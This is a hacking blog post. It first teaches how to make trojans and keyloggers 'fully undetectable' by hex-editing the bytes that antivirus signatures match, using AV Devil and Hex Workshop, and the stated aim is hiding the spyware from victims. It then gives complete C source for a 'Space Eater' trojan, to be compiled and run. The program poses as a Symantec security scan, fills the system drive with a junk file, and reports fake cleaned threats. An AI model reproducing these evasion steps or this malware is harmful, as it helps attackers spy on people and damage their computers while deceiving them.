HOW TO MAKE A TROJAN, KEYLOGGERS, VIRUS UNDETECTABLE BY ANTIVIRUS SOFTWARE - HEX EDITING
Chinmoy Pratim Borah

I've been writing a lot about keylogging on this blog. Now, as you know, most keyloggers are detected by anti-virus software, so what you really want is a FUD keylogger (Fully Undetectable). That means no anti-virus software will alert the victim saying it's a virus. There are very few FUD keyloggers on the web, and most of the time you need to buy a keylogger that will be FUD for a long time. They normally cost about $3-$20, depending on the functions of the builder.
Since FUD keyloggers cost money, I decided to show you how to make them undetectable for free, using the hex editing method.
Here I will try to explain how to hex edit your favorite Trojan in order to make it undetected by certain anti-virus programs. I will try to put this as simply as possible so everyone understands it.
Content:
1. General info about hexediting.
2. What tools you need to get started.
3. How to hex.
General info about hexediting
If you want to make your server undetectable, you need to know how AVs work and how they detect your files, right? There are a few ways that AVs use to detect your server (heuristics, sandboxing, etc.), and one of them is using so-called "definition files" that carry information about strings inside your server. Well, that's the method we are going after in this tutorial, because hexing is pretty much useless against other methods of detection. So when an AV scans your file it searches for specific strings in specific parts of your server, and if the strings match strings in the AV database, your file is detected.
Let us say that the detected string is "XX", so we need to change that string to something else (e.g. "XY", "YY") that isn't in the AV definition database, so the file cannot be matched with any of the AV definitions and that way the file will be undetectable. There are going to be a few tagged strings in your server, not only one, depending on what trojan you are using and how popular it is. Less popular trojans tend to have fewer tagged parts, and with that they are easier to make undetectable.
First of all, hexing is not the best method for making files undetected, because AVs can change old tagged parts, and once your AV is updated and new definition files are downloaded, your once undetected server might become detected again. Also, not all AVs use the same tagged parts, so you need to hex your server against more AVs to make it fully undetected. This can be annoying because you need to download the wanted AV, then hex your server, then download another, etc. Sometimes AVs tag critical parts of the server, and altering that part will corrupt the server. Also, heavily edited servers can become unstable, some functions might not work, or you can even corrupt your server and make it useless.
That's why you need to check whether your server still works after every single change you make while hexing it.
Now, how do you find the detected strings in your server?
There are a few ways you can do this: manually cut your server in half, adding parts to one half and scanning it until you find the detected string (which is slow and time consuming); use a file splitter to split your server into bytes, scan all the split files to find out which byte is detected, then alter it in the original exe; or use an offset AV tool.
What tools you need to get started
Unpacked trojan/keylogger server (that's your virus)
Hex editor
AV Devil
File Splitter (optional)
AV (antivirus)
How to hex
Step 1.
Turn your AV real-time protection "OFF". Make your Trojan server and make sure that it is not packed. Open AV Devil and select your server. After selecting the server, a message will pop up; click OK, and the next message will pop up asking you to turn your AV real-time protection back "ON". After you do that, just click "OK" and let AV Devil search for detected offsets. During the search your AV will pop up a couple of times. Just click on "Skip" and let AV Devil finish.

After it's done you will see something like this:

As you can see, this Trojan server has only two detected offsets. That means that the first detected offset begins at 53F7 and ends at 5476. You can also see where the second offset starts and ends. That's the part that the AV is checking in its definition database. If the part in the server matches the part in the AV database, your server is detected. You can hex the beginning and ending offset or in between.
Step 2.
Now that we have the detected offsets, we open our server in Hex Workshop. Press "Ctrl+G" and this will come up:

Type the first offset in, select "Beginning of File", and make sure that you selected "hex", because offsets in AV Devil are displayed in that manner, unless you save via AV Devil, in which case they are converted into decimal. Click "Go" and you will be sent to that offset location. Now we need to change that "31" to something else, so we will change it to "32".

Select "31", right click on it and select Fill.

You will see the window below. In "Fill with the following hex byte" we are going to fill in "32" and hit OK.

After clicking "OK", the changed hex byte is going to be shown in red.

Now repeat this for every offset that you found in AV Devil.

Going to change "FE" to "EE" and so on for all other detected offsets.

Once you've completed editing all offsets, save your server and scan to see if it's UD, and then you're done. If the AV is still detecting it, repeat steps 1 and 2.
Here's a little tip on how to change detected bytes: try to make minor changes like 32 => 31, 22, 42, 33, 34, or FE => EE, FF, etc. Basically, one character up/down for each; that's the best way and will minimize the chances of corrupting your server. If that doesn't work for some reason, you can try to change it to something completely different, but always check your server after editing bytes. That way you can see if the server works or if it's corrupted (you can keep track of what change caused the corruption and try to edit that byte with some other character).
Another thing in some Trojan servers is that AV Devil can't find the beginning of the first offset and will mark it with "0". Let's say you've hexed all other found offsets but your server is still detected. Split the file in half and run AV Devil on the first half. That way you will be able to find the first offset that is missing and finish your hexing. If some tagged part is a letter, e.g. "Y", change it to "y", or just PlAy wItH ThE CaPs.
Ex:

So there you have it! Now you know how to hex your server and make it undetected from wanted AVs.

How to make Trojan using 'C' language

31/07/2009 15:58
This program is written in the 'C' language. You just have to paste these lines into a 'C' compiler and then make an executable file.
```c
/* SPACE EATER TROJAN BY SUKHDEEP. USE IT FOR EDUCATIONAL PURPOSES ONLY.
   DO NOT SPREAD! */
/* Written for Turbo C / Borland C on Windows: conio.h provides textcolor(),
   gotoxy(), cputs(), getch(), clrscr(), delline() and cprintf(); dos.h
   provides sleep(); stdlib.h provides exit() and random(). The header
   names were lost in the original page and are restored here. */
#include <stdio.h>
#include <conio.h>
#include <dos.h>
#include <stdlib.h>

FILE *a, *t, *b;
int r, status, vir_count;
double i;
/* text that is written over and over into the junk file */
char ch[] = "CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE", choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
    draw();
    accept();
    textcolor(WHITE);
    draw();
    gotoxy(12, 8);
    cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
    sleep(3);
    gotoxy(12, 8);
    delline();
    cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
    getch();
    gotoxy(12, 8);
    delline();
    findroot();
}

/* Shows the warning text and quits unless the user presses Enter (13). */
void accept()
{
    textcolor(LIGHTRED);
    gotoxy(1, 8);
    cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS "
          "PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER "
          "IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE "
          "TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU "
          "WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
    if ((choice = getch()) != 13)
        exit(0);
}

/* Draws the fake "security scan" frame. */
void draw()
{
    clrscr();
    textcolor(WHITE);
    gotoxy(12, 2);
    cputs("********************************************************");
    gotoxy(12, 6);
    cputs("********************************************************");
    gotoxy(12, 3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(67, 3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(14, 4);
    cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

/* Looks for windows\explorer.exe on C:, D:, E: and F: to find the system
   drive; on the first drive found it creates spceshot.dll in system32 and
   starts filling it. If the file already exists the program quits. */
void findroot()
{
    t = fopen("C:\\windows\\explorer.exe", "rb");
    if (t != NULL)
    {
        fclose(t);
        textcolor(WHITE);
        a = fopen("C:\\windows\\system32\\spceshot.dll", "rb");
        if (a != NULL)
        {
            textcolor(LIGHTRED);
            gotoxy(12, 8);
            cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
            getch();
            exit(1);
        }
        b = fopen("C:\\windows\\system32\\spceshot.dll", "wb+");
        if (b != NULL)
        {
            showstatus();
            eatspace();
        }
    }
    t = fopen("D:\\windows\\explorer.exe", "rb");
    if (t != NULL)
    {
        fclose(t);
        a = fopen("D:\\windows\\system32\\spceshot.dll", "rb");
        if (a != NULL)
        {
            textcolor(LIGHTRED);
            gotoxy(12, 8);
            cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
            getch();
            exit(1);
        }
        b = fopen("D:\\windows\\system32\\spceshot.dll", "wb+");
        if (b != NULL)
        {
            showstatus();
            eatspace();
        }
    }
    t = fopen("E:\\windows\\explorer.exe", "rb");
    if (t != NULL)
    {
        fclose(t);
        a = fopen("E:\\windows\\system32\\spceshot.dll", "rb");
        if (a != NULL)
        {
            textcolor(LIGHTRED);
            gotoxy(12, 8);
            cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
            getch();
            exit(1);
        }
        b = fopen("E:\\windows\\system32\\spceshot.dll", "wb+");
        if (b != NULL)
        {
            showstatus();
            eatspace();
        }
    }
    t = fopen("F:\\windows\\explorer.exe", "rb");
    if (t != NULL)
    {
        fclose(t);
        a = fopen("F:\\windows\\system32\\spceshot.dll", "rb");
        if (a != NULL)
        {
            textcolor(LIGHTRED);
            gotoxy(12, 8);
            cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
            getch();
            exit(1);
        }
        b = fopen("F:\\windows\\system32\\spceshot.dll", "wb+");
        if (b != NULL)
        {
            showstatus();
            eatspace();
        }
    }
    if (t == NULL)
    {
        textcolor(LIGHTRED);
        gotoxy(12, 8);
        cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
        getch();
        exit(1);
    }
    exit(1);
}

/* Writes ch into the junk file until fputs() fails (disk full), printing
   a dot after every 900000 writes to look like scan progress. */
void eatspace()
{
    textcolor(LIGHTRED);
    gotoxy(12, 16);
    cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
    textcolor(WHITE);
    gotoxy(12, 18);
    while (1)
    {
        for (r = 1; r < 4; r++)
        {
            for (i = 1; i < 900000; i++)
            {
                status = fputs(ch, b);
                if (status == EOF)
                {
                    textcolor(WHITE);
                    vir_count = random(120);
                    draw();
                    gotoxy(12, 8);
                    cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!", vir_count);
                    gotoxy(12, 10);
                    cprintf("PRESS ANY KEY TO CLOSE...");
                    getch();
                    break;
                }
            }
            cputs(".");
            if (status == EOF) break;
        }
        if (status == EOF) break;
    }
    exit(0);
}

/* Status text shown while the junk file is being written. */
void showstatus()
{
    gotoxy(12, 8);
    cputs("SCANNING THE SYSTEM FOR THREATS");
    gotoxy(12, 10);
    cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
    gotoxy(12, 13);
    cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
```

Read more: http://hacking-tricks.webnode.com/news/how-to-make-trojan-using-c-language/

